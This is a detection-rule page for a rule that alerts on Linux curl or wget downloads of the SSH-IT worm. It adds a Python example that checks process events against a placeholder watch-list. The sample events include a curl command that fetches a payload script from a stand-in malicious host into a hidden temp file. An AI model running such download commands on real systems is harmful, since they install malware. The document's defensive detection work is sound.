
Summary
This rule is designed to detect processes on Linux systems that attempt to download files linked to a known SSH worm, specifically the SSH-IT autonomous worm. The worm abuses SSH connections by monitoring outgoing sessions in order to facilitate lateral movement within compromised environments. Detection is based on specific command line arguments in the execution of processes such as `curl` or `wget` that are known to download the worm from identified malicious URLs. The monitored logs include various endpoint event data sources, such as logs from auditd, CrowdStrike, and Elastic Defend. The rule applies a medium severity risk score of 47, alerting security teams when this behavior is detected. An investigation and response guide is included to help handle alerts effectively, advising on confirmation steps and remediation actions to mitigate the risk of infection.
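The summary above describes the detection idea without giving the query itself. The following is an added illustration, not the rule's own query or any vendor's code: it runs that logic over a few constructed Linux process events, flagging `curl` or `wget` executions whose command line points at a watch-listed download location and attaching the rule's risk score of 47. The host and path values in the watch-list are placeholders I made up for the example; the real indicators are not on this page. Field names (`process.name`, `process.command_line`, `host.name`) follow Elastic Common Schema as an assumption about the event shape.

```python
"""Added example: evaluate process events for curl/wget fetches of a
watch-listed payload, in the spirit of the SSH worm download rule.
The watch-list entries are constructed placeholders, NOT real indicators.
"""
import shlex
from urllib.parse import urlparse

# Processes the rule summary says are used to pull the worm down.
DOWNLOADERS = {"curl", "wget"}

# Medium severity, as stated in the rule summary.
RISK_SCORE = 47

# Placeholder indicators (constructed for this example; replace with the
# vetted values from the rule or your threat intelligence feed).
WATCHLISTED_HOSTS = {"worm-dropper.example.invalid"}
WATCHLISTED_PATHS = {"/ssh-it-payload.sh"}


def extract_urls(command_line):
    """Return the http/https arguments of a shell command line."""
    try:
        args = shlex.split(command_line)
    except ValueError:
        # Unbalanced quotes: fall back to a naive split rather than dropping
        # the event, so an odd command line cannot evade inspection.
        args = command_line.split()
    return [a for a in args if a.lower().startswith(("http://", "https://"))]


def matches_indicator(url):
    """True if the URL's host or path is on the watch-list."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    return host in WATCHLISTED_HOSTS or parsed.path in WATCHLISTED_PATHS


def evaluate_event(event):
    """Return an alert dict for a matching process event, else None."""
    name = event.get("process.name", "")
    if name not in DOWNLOADERS:
        return None
    hits = [u for u in extract_urls(event.get("process.command_line", ""))
            if matches_indicator(u)]
    if not hits:
        return None
    return {
        "rule": "Potential SSH-IT worm download",
        "risk_score": RISK_SCORE,
        "host": event.get("host.name", "unknown"),
        "process": name,
        "indicators": hits,
    }


def evaluate_events(events):
    """Run the check over a batch of events and return the alerts."""
    return [a for a in (evaluate_event(e) for e in events) if a]


# Constructed sample events: one true positive, two benign, one non-downloader.
SAMPLE_EVENTS = [
    {"host.name": "web-01", "process.name": "curl",
     "process.command_line":
         "curl -fsSL http://worm-dropper.example.invalid/ssh-it-payload.sh -o /tmp/.x"},
    {"host.name": "web-01", "process.name": "wget",
     "process.command_line": "wget https://deb.debian.org/debian/dists/stable/Release"},
    {"host.name": "db-02", "process.name": "curl",
     "process.command_line": "curl -s https://api.internal.example/health"},
    {"host.name": "db-02", "process.name": "python3",
     "process.command_line":
         "python3 -c 'import urllib.request as u; u.urlopen(\"http://worm-dropper.example.invalid/\")'"},
]

if __name__ == "__main__":
    for alert in evaluate_events(SAMPLE_EVENTS):
        print(alert)
```

The last sample event deliberately uses the watch-listed host from `python3` rather than `curl`/`wget`: it is not flagged, which mirrors the summary's scope (downloader processes only) and is the kind of gap an analyst should keep in mind when tuning coverage.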
Categories
- Linux
- Endpoint
- Other
Data Sources
- Container
- Process
- Network Traffic
- File
- Logon Session
- Application Log
ATT&CK Techniques
- T1021
- T1021.004
- T1563
- T1563.001
Created: 2023-09-21